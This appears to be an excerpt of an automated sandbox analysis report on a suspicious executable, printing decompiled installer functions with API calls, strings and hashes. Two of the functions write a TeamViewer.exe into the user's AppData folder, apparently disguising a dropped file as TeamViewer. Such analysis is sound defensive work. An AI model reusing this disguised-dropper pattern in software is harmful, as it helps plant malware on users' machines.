                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: 746814$74681500AllocGlobalwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4143394720-0
                                                                                                                        • Opcode ID: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                                        • Instruction ID: 178fa6cf4330108057832d0c189c0e5a27020503733a18e797ef1cc5e9d7aef6
                                                                                                                        • Opcode Fuzzy Hash: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                                        • Instruction Fuzzy Hash: 52113A71A00108BEDB01EFA5DD819AEBBB9EB48344B20853AF501F61E1D7389A54DB28
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 33%
                                                                                                                        			E00401D1B() {
				void* __esi;
				int _t5;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t5 =  *0x407238( *((intOrPtr*)(_t28 - 0x34)), 0x5a, 0x48);
				_t6 =  *0x407040();
				0x40af74->lfHeight =  ~(MulDiv(E004029D9(2), _t6, _t5));
				 *0x40af84 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af8b = 1;
				 *0x40af88 = _t11 & 0x00000001;
				 *0x40af89 = _t11 & 0x00000002;
				 *0x40af8a = _t11 & 0x00000004;
				E00405B88(_t18, _t24, _t26, 0x40af90,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af74);
				_push(_t14);
				_push(_t26);
				E00405AC4();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}












                                                                                                                        0x00401d22
                                                                                                                        0x00401d29
                                                                                                                        0x00401d42
                                                                                                                        0x00401d4c
                                                                                                                        0x00401d51
                                                                                                                        0x00401d5c
                                                                                                                        0x00401d63
                                                                                                                        0x00401d75
                                                                                                                        0x00401d7b
                                                                                                                        0x00401d80
                                                                                                                        0x00401d8a
                                                                                                                        0x004024b8
                                                                                                                        0x00401561
                                                                                                                        0x00402833
                                                                                                                        0x0040288e
                                                                                                                        0x0040289a

                                                                                                                        APIs
                                                                                                                        • 73BBAC50.USER32(?,0000005A,00000048), ref: 00401D22
                                                                                                                        • 73BBAD70.GDI32(00000000), ref: 00401D29
                                                                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                                        • CreateFontIndirectA.GDI32(0040AF74), ref: 00401D8A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFontIndirect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3720817429-0
                                                                                                                        • Opcode ID: 65d6d6c3eade4a3ebb09d4d6b1d43c63415d6ff7796dc61260d2c7023a1fee7c
                                                                                                                        • Instruction ID: d83410998d1654a5337f8c322709d39cf2ce3a8a4f0330bc6585c9693e616625
                                                                                                                        • Opcode Fuzzy Hash: 65d6d6c3eade4a3ebb09d4d6b1d43c63415d6ff7796dc61260d2c7023a1fee7c
                                                                                                                        • Instruction Fuzzy Hash: E1F044F1A45342AEE7016770AE0ABA93B649725306F100576F541BA1E2C5BC10149B7F
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 62%
                                                                                                                        			E00402020() {
				intOrPtr* _t49;
				intOrPtr* _t51;
				intOrPtr* _t53;
				intOrPtr* _t55;
				signed int _t59;
				intOrPtr* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t72;
				int _t76;
				signed int _t82;
				intOrPtr* _t89;
				void* _t96;
				void* _t97;
				void* _t101;

				 *(_t101 - 0x30) = E004029F6(0xfffffff0);
				_t97 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t101 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t101 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t101 - 0x44)) = E004029F6(0x45);
				if(E004056C6(_t97) == 0) {
					E004029F6(0x21);
				}
				_push(_t101 + 8);
				_push(0x407374);
				_push(1);
				_push(_t76);
				_push(0x407384);
				if( *0x407284() < _t76) {
					L13:
					 *((intOrPtr*)(_t101 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t49 =  *((intOrPtr*)(_t101 + 8));
					_t96 =  *((intOrPtr*)( *_t49))(_t49, 0x407394, _t101 - 0x34);
					if(_t96 >= _t76) {
						_t53 =  *((intOrPtr*)(_t101 + 8));
						_t96 =  *((intOrPtr*)( *_t53 + 0x50))(_t53, _t97);
						_t55 =  *((intOrPtr*)(_t101 + 8));
						 *((intOrPtr*)( *_t55 + 0x24))(_t55, "C:\\Users\\engineer\\AppData\\Roaming\\TeamViewer");
						_t82 =  *(_t101 - 0x14);
						_t59 = _t82 >> 0x00000008 & 0x000000ff;
						if(_t59 != 0) {
							_t89 =  *((intOrPtr*)(_t101 + 8));
							 *((intOrPtr*)( *_t89 + 0x3c))(_t89, _t59);
							_t82 =  *(_t101 - 0x14);
						}
						_t60 =  *((intOrPtr*)(_t101 + 8));
						 *((intOrPtr*)( *_t60 + 0x34))(_t60, _t82 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t101 - 8)))) != _t76) {
							_t72 =  *((intOrPtr*)(_t101 + 8));
							 *((intOrPtr*)( *_t72 + 0x44))(_t72,  *((intOrPtr*)(_t101 - 8)),  *(_t101 - 0x14) & 0x000000ff);
						}
						_t63 =  *((intOrPtr*)(_t101 + 8));
						 *((intOrPtr*)( *_t63 + 0x2c))(_t63,  *((intOrPtr*)(_t101 - 0x2c)));
						_t65 =  *((intOrPtr*)(_t101 + 8));
						 *((intOrPtr*)( *_t65 + 0x1c))(_t65,  *((intOrPtr*)(_t101 - 0x44)));
						if(_t96 >= _t76) {
							_t96 = 0x80004005;
							if(MultiByteToWideChar(_t76, _t76,  *(_t101 - 0x30), 0xffffffff, 0x409368, 0x400) != 0) {
								_t70 =  *((intOrPtr*)(_t101 - 0x34));
								_t96 =  *((intOrPtr*)( *_t70 + 0x18))(_t70, 0x409368, 1);
							}
						}
						_t67 =  *((intOrPtr*)(_t101 - 0x34));
						 *((intOrPtr*)( *_t67 + 8))(_t67);
					}
					_t51 =  *((intOrPtr*)(_t101 + 8));
					 *((intOrPtr*)( *_t51 + 8))(_t51);
					if(_t96 >= _t76) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t101 - 4));
				return 0;
			}




















                                                                                                                        0x00402029
                                                                                                                        0x00402033
                                                                                                                        0x0040203c
                                                                                                                        0x00402046
                                                                                                                        0x0040204f
                                                                                                                        0x00402059
                                                                                                                        0x0040205d
                                                                                                                        0x0040205d
                                                                                                                        0x00402065
                                                                                                                        0x00402066
                                                                                                                        0x0040206b
                                                                                                                        0x0040206d
                                                                                                                        0x0040206e
                                                                                                                        0x0040207b
                                                                                                                        0x0040215b
                                                                                                                        0x0040215b
                                                                                                                        0x00402162
                                                                                                                        0x00402081
                                                                                                                        0x00402081
                                                                                                                        0x00402092
                                                                                                                        0x00402096
                                                                                                                        0x0040209c
                                                                                                                        0x004020a6
                                                                                                                        0x004020a8
                                                                                                                        0x004020b3
                                                                                                                        0x004020b6
                                                                                                                        0x004020c3
                                                                                                                        0x004020c5
                                                                                                                        0x004020c7
                                                                                                                        0x004020ce
                                                                                                                        0x004020d1
                                                                                                                        0x004020d1
                                                                                                                        0x004020d4
                                                                                                                        0x004020de
                                                                                                                        0x004020e6
                                                                                                                        0x004020eb
                                                                                                                        0x004020f7
                                                                                                                        0x004020f7
                                                                                                                        0x004020fa
                                                                                                                        0x00402103
                                                                                                                        0x00402106
                                                                                                                        0x0040210f
                                                                                                                        0x00402114
                                                                                                                        0x00402126
                                                                                                                        0x00402135
                                                                                                                        0x00402137
                                                                                                                        0x00402143
                                                                                                                        0x00402143
                                                                                                                        0x00402135
                                                                                                                        0x00402145
                                                                                                                        0x0040214b
                                                                                                                        0x0040214b
                                                                                                                        0x0040214e
                                                                                                                        0x00402154
                                                                                                                        0x00402159
                                                                                                                        0x0040216e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402159
                                                                                                                        0x00402164
                                                                                                                        0x0040288e
                                                                                                                        0x0040289a

                                                                                                                        APIs
                                                                                                                        • 7629B690.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409368,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Roaming\TeamViewer, xrefs: 004020AB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: 7629B690ByteCharMultiWide
                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\TeamViewer
                                                                                                                        • API String ID: 2244051918-4213038595
                                                                                                                        • Opcode ID: 8bdc297386af4af811401e14d97a43bdbeccf624015d579e5e20aa8428512c8b
                                                                                                                        • Instruction ID: 0b92ce9401c32f92a97655b67b17bc3e2e7042a2ba93bb40bff56c30807ccd12
                                                                                                                        • Opcode Fuzzy Hash: 8bdc297386af4af811401e14d97a43bdbeccf624015d579e5e20aa8428512c8b
                                                                                                                        • Instruction Fuzzy Hash: 94418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403978, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00403978(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405ADD(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E00405AC4(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420478, E00405B88(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405B88(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                                                        0x0040397c
                                                                                                                        0x00403981
                                                                                                                        0x00403987
                                                                                                                        0x0040398c
                                                                                                                        0x0040398c
                                                                                                                        0x00403994
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040399c
                                                                                                                        0x004039a4
                                                                                                                        0x004039a6
                                                                                                                        0x004039ac
                                                                                                                        0x004039ac
                                                                                                                        0x004039ae
                                                                                                                        0x004039ba
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004039be
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004039c0
                                                                                                                        0x004039c5
                                                                                                                        0x004039ce
                                                                                                                        0x004039d4
                                                                                                                        0x004039d9
                                                                                                                        0x004039ed
                                                                                                                        0x004039f8
                                                                                                                        0x00403a10
                                                                                                                        0x00403a16
                                                                                                                        0x00403a1b
                                                                                                                        0x00403a23
                                                                                                                        0x00403a44
                                                                                                                        0x00403a44
                                                                                                                        0x00403a44
                                                                                                                        0x00403a25
                                                                                                                        0x00403a27
                                                                                                                        0x00403a27
                                                                                                                        0x00403a2b
                                                                                                                        0x00403a32
                                                                                                                        0x00403a32
                                                                                                                        0x00403a37
                                                                                                                        0x00403a3d
                                                                                                                        0x00403a3d
                                                                                                                        0x00000000
                                                                                                                        0x00403a27
                                                                                                                        0x004039db
                                                                                                                        0x004039e0
                                                                                                                        0x004039e9
                                                                                                                        0x004039e2
                                                                                                                        0x004039e2
                                                                                                                        0x004039e2
                                                                                                                        0x004039e0

                                                                                                                        APIs
                                                                                                                        • SetWindowTextA.USER32(00000000,004236A0), ref: 00403A10
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: TextWindow
                                                                                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 530164218-3512041753
                                                                                                                        • Opcode ID: 3de9c273dcbb814963b36f795d2ecfd45048fc62fbd5e49154c857ec1ced3a84
                                                                                                                        • Instruction ID: 09623374405f0611f065d620c03919b516a5f167df25bc0d5edc66fe9dc562c0
                                                                                                                        • Opcode Fuzzy Hash: 3de9c273dcbb814963b36f795d2ecfd45048fc62fbd5e49154c857ec1ced3a84
                                                                                                                        • Instruction Fuzzy Hash: F611C2B1B005109BC730DF15D880A73767DEB84716369413BE94167391C77EAE028E58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404E54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00404E54(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420488 != _t22) {
							 *0x420488 = _t22;
							E00405B66(0x4204a0, 0x424000);
							E00405AC4(0x424000, _t22);
							E0040140B(6);
							E00405B66(0x424000, 0x4204a0);
						}
						L11:
						return CallWindowProcA( *0x420490, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004047D3(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F64(0x413);
				return 0;
			}




                                                                                                                        0x00404e60
                                                                                                                        0x00404e85
                                                                                                                        0x00404ea5
                                                                                                                        0x00404ea8
                                                                                                                        0x00404eab
                                                                                                                        0x00404ec2
                                                                                                                        0x00404ec8
                                                                                                                        0x00404ecf
                                                                                                                        0x00404ed6
                                                                                                                        0x00404edd
                                                                                                                        0x00404ee2
                                                                                                                        0x00404ee8
                                                                                                                        0x00000000
                                                                                                                        0x00404ef8
                                                                                                                        0x00404e92
                                                                                                                        0x00404ee5
                                                                                                                        0x00404ee5
                                                                                                                        0x00000000
                                                                                                                        0x00404ee5
                                                                                                                        0x00404e9e
                                                                                                                        0x00404ea0
                                                                                                                        0x00000000
                                                                                                                        0x00404ea0
                                                                                                                        0x00404e66
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404e6d
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00404E8A
                                                                                                                        • CallWindowProcA.USER32 ref: 00404EF8
                                                                                                                          • Part of subcall function 00403F64: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F76
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                        • Opcode ID: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                                        • Instruction ID: 62f3a1a08e098275047049d4f9968a6b4933f6b7f921e7009373277d82a30415
                                                                                                                        • Opcode Fuzzy Hash: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                                        • Instruction Fuzzy Hash: D1116D71900208BBDB21AF52DC4499B3669FB84369F00803BF6047A2E2C37C5A519BAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004024BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t6;
				struct _OVERLAPPED* _t10;
				intOrPtr* _t14;
				void* _t16;
				int _t20;

				_t14 = __esi;
				_t10 = __ebx;
				if( *((intOrPtr*)(_t16 - 0x1c)) == __ebx) {
					_t6 = E004029F6(0x11);
					_push(_t6);
					L00405B7C();
				} else {
					E004029D9(1);
					 *0x409f70 = __al;
				}
				if( *_t14 == _t10) {
					L8:
					 *((intOrPtr*)(_t16 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405ADD(_t16 + 8, _t14), " "C:\Users\engineer\AppData\Roaming\TeamViewer\TeamViewer.exe"", _t6, _t16 + 8, _t10);
					_t20 = _t5;
					if(_t20 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}









                                                                                                                        0x004024be
                                                                                                                        0x004024be
                                                                                                                        0x004024c1
                                                                                                                        0x004024d6
                                                                                                                        0x004024db
                                                                                                                        0x004024dc
                                                                                                                        0x004024c3
                                                                                                                        0x004024c5
                                                                                                                        0x004024ca
                                                                                                                        0x004024d1
                                                                                                                        0x004024e3
                                                                                                                        0x0040265c
                                                                                                                        0x0040265c
                                                                                                                        0x004024e9
                                                                                                                        0x004024fb
                                                                                                                        0x004015a6
                                                                                                                        0x004015a8
                                                                                                                        0x00000000
                                                                                                                        0x004015ae
                                                                                                                        0x004015a8
                                                                                                                        0x0040288e
                                                                                                                        0x0040289a

                                                                                                                        APIs
                                                                                                                        • lstrlen.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                                                        • WriteFile.KERNEL32(00000000,?, "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe",00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                                                        Strings
                                                                                                                        • "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe", xrefs: 004024CA, 004024EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWritelstrlen
                                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"
                                                                                                                        • API String ID: 427699356-1099692596
                                                                                                                        • Opcode ID: b17d70d1d37ace8b3219b3e25872661ee24ef85dcd84733a3d500bda6f130cd4
                                                                                                                        • Instruction ID: 2c1f07a632d72534084a5ac00d75746702f795d1104bf50e8da4b719a2e94720
                                                                                                                        • Opcode Fuzzy Hash: b17d70d1d37ace8b3219b3e25872661ee24ef85dcd84733a3d500bda6f130cd4
                                                                                                                        • Instruction Fuzzy Hash: BCF08972A44245FFD710EBB19E49EAF7668DB00348F14443BB142F51C2D6FC5982976D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040361A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040361A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f45c;
				_t3 = E004035FF(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f45c =  *0x41f45c & 0x00000000;
				return _t3;
			}







                                                                                                                        0x0040361b
                                                                                                                        0x00403623
                                                                                                                        0x0040362a
                                                                                                                        0x0040362d
                                                                                                                        0x0040362d
                                                                                                                        0x0040362f
                                                                                                                        0x00403634
                                                                                                                        0x0040363b
                                                                                                                        0x00403641
                                                                                                                        0x00403645
                                                                                                                        0x00403646
                                                                                                                        0x0040364e

                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,00000000,747DF560,004035F1,00000000,0040342D,00000000), ref: 00403634
                                                                                                                        • GlobalFree.KERNEL32 ref: 0040363B
                                                                                                                        Strings
                                                                                                                        • "C:\Users\user\Desktop\77Etc0bR2v.exe" , xrefs: 0040362C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                                        • String ID: "C:\Users\user\Desktop\77Etc0bR2v.exe"
                                                                                                                        • API String ID: 1100898210-1136564451
                                                                                                                        • Opcode ID: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                                        • Instruction ID: 07f203a12dc211ea1540440f4769086933c1ddaa55d0411da1bb29b7fd771b51
                                                                                                                        • Opcode Fuzzy Hash: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                                        • Instruction Fuzzy Hash: 8FE08C32804420ABC6216F55EC0579A7768AB48B22F028536E900BB3A083743C464BDC
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004056A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 88%
                                                                                                                        			E004056A0(void* __eax, char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_push(_t5);
				L00405B7C();
				_t3 = __eax + _t5;
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                                        0x004056a1
                                                                                                                        0x004056a5
                                                                                                                        0x004056a6
                                                                                                                        0x004056ab
                                                                                                                        0x004056ad
                                                                                                                        0x004056b4
                                                                                                                        0x004056bc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004056bc
                                                                                                                        0x004056be
                                                                                                                        0x004056c3

                                                                                                                        APIs
                                                                                                                        • lstrlen.KERNEL32(80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\77Etc0bR2v.exe,C:\Users\user\Desktop\77Etc0bR2v.exe,80000000,00000003), ref: 004056A6
                                                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\77Etc0bR2v.exe,C:\Users\user\Desktop\77Etc0bR2v.exe,80000000,00000003), ref: 004056B4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrlen
                                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                                        • API String ID: 2709904686-3125694417
                                                                                                                        • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                        • Instruction ID: 6658d1b0ab05e5211e75f0b74aef41c49d7b43cb9628f8e009f88ad9fa15a52a
                                                                                                                        • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                        • Instruction Fuzzy Hash: C5D0A772409DB02EF30352108C04B8F7A98CF17300F0948A2E440E21D0C27C5C818FFD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

